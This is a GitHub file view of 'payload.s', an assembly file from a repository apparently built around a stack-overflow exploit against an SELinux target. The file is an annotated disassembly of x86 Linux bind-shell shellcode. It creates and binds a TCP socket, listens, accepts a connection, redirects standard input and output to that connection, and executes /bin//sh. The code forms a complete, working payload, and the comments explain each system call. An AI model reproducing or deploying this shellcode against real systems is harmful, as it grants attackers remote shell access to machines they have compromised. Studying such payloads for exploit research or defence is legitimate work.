forked from oghie/stackoverflow-exploit-selinux
-
Notifications
You must be signed in to change notification settings - Fork 0
/
payload.s
81 lines (61 loc) · 4.49 KB
/
payload.s
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
# Comment Payload Assembly Code:
0x8049d60 <shellcode>: add $0x80,%esp # Move the the stack pointer out of the way so we our shellcode
# doesn't overwrite itself on the stack
0x8049d63 <shellcode+3>: push $0x66 # push system call number - socketcall (socket system calls)
0x8049d65 <shellcode+5>: push $0x1
0x8049d67 <shellcode+7>: pop %ebx
0x8049d68 <shellcode+8>: pop %eax # Store system call number in eax before call (socketcall)
0x8049d69 <shellcode+9>: cltd
0x8049d6a <shellcode+10>: push %edx # Save other parameters in registers
0x8049d6b <shellcode+11>: push $0x1
0x8049d6d <shellcode+13>: push $0x2
0x8049d6f <shellcode+15>: mov %esp,%ecx
0x8049d71 <shellcode+17>: int $0x80 # Call a software intrupt to switch to the kernel and execute socketcall call
0x8049d73 <shellcode+19>: mov %eax,%esi
0x8049d75 <shellcode+21>: push $0x66 # push system call number - socketcall (socket system calls)
0x8049d77 <shellcode+23>: pop %eax # Store system call number in eax (socketcall)
0x8049d78 <shellcode+24>: inc %ebx # Save other parameters in registers before making interrupt ...
0x8049d79 <shellcode+25>: push %edx
0x8049d7a <shellcode+26>: pushw $0x15fc
0x8049d7e <shellcode+30>: push %bx
0x8049d80 <shellcode+32>: mov %esp,%ecx
0x8049d82 <shellcode+34>: push $0x10
0x8049d84 <shellcode+36>: push %ecx
0x8049d85 <shellcode+37>: push %esi
0x8049d86 <shellcode+38>: mov %esp,%ecx
0x8049d88 <shellcode+40>: int $0x80 # Call a software intrupt to switch to the kernel and execute socketcall
0x8049d8a <shellcode+42>: push $0x66 # push system call number - socketcall (socket system calls)
0x8049d8c <shellcode+44>: pop %eax # Store system call number in eax (socketcall) before interrupt
0x8049d8d <shellcode+45>: inc %ebx # Save other parameters in registers before making interrupt call
0x8049d8e <shellcode+46>: inc %ebx
0x8049d8f <shellcode+47>: push $0x5
0x8049d91 <shellcode+49>: push %esi
0x8049d92 <shellcode+50>: int $0x80 # Call a software intrupt to switch to the kernel and execute socketcall
0x8049d94 <shellcode+52>: push $0x66 # push system call number - socketcall (socket system calls)
0x8049d96 <shellcode+54>: pop %eax # Store system call number in eax (socketcall)
0x8049d97 <shellcode+55>: inc %ebx # Save other parameters in registers before making interrupt call
0x8049d98 <shellcode+56>: push %edx
0x8049d99 <shellcode+57>: push %edx
0x8049d9a <shellcode+58>: push %esi
0x8049d9b <shellcode+59>: mov %esp,%ecx
0x8049d9d <shellcode+61>: int $0x80 # Call a software intrupt to switch to the kernel and execute socketcall
0x8049d9f <shellcode+63>: mov %eax,%ebx
0x8049da1 <shellcode+65>: push $0x3f # dup2 - duplicate a file descriptor
0x8049da3 <shellcode+67>: pop %eax # Store system call number in eax (dup2)
0x8049da4 <shellcode+68>: xor %ecx,%ecx # Save other parameters in registers before making interrupt (clear ecx - NULL)
0x8049da6 <shellcode+70>: int $0x80 # Call a software intrupt to switch to the kernel and execute dup2
0x8049da8 <shellcode+72>: push $0x3f # dup2 duplicate a file descriptor
0x8049daa <shellcode+74>: pop %eax # Store system call number in eax (dup2)
0x8049dab <shellcode+75>: inc %ecx # Save other parameters in registers before making interrupt (1)
0x8049dac <shellcode+76>: int $0x80 # Call a software intrupt to switch to the kernel and execute (dup2)
0x8049dae <shellcode+78>: xor %eax,%eax # Clear eax
0x8049db0 <shellcode+80>: push %eax # Push eax on to the stack
0x8049db1 <shellcode+81>: push $0x68732f2f # push parameters onto the stack
0x8049db6 <shellcode+86>: push $0x6e69622f # push parameters onto the stack
0x8049dbb <shellcode+91>: mov %esp,%ebx # stack frame
0x8049dbd <shellcode+93>: cltd # Convert Signed Long to Signed Double Long (cltd) (sign-extend EAX -> EDX:EAX )
0x8049dbe <shellcode+94>: push %eax # Store system call number in eax
0x8049dbf <shellcode+95>: mov $0xb,%al # Store system number for execve in eax before calling software intertup (b in hex)
0x8049dc1 <shellcode+97>: pop %ecx
0x8049dc2 <shellcode+98>: int $0x80 # Call a software intrupt to switch to the kernel and execute (execve)
0x8049dc4 <shellcode+100>: add %al,(%eax)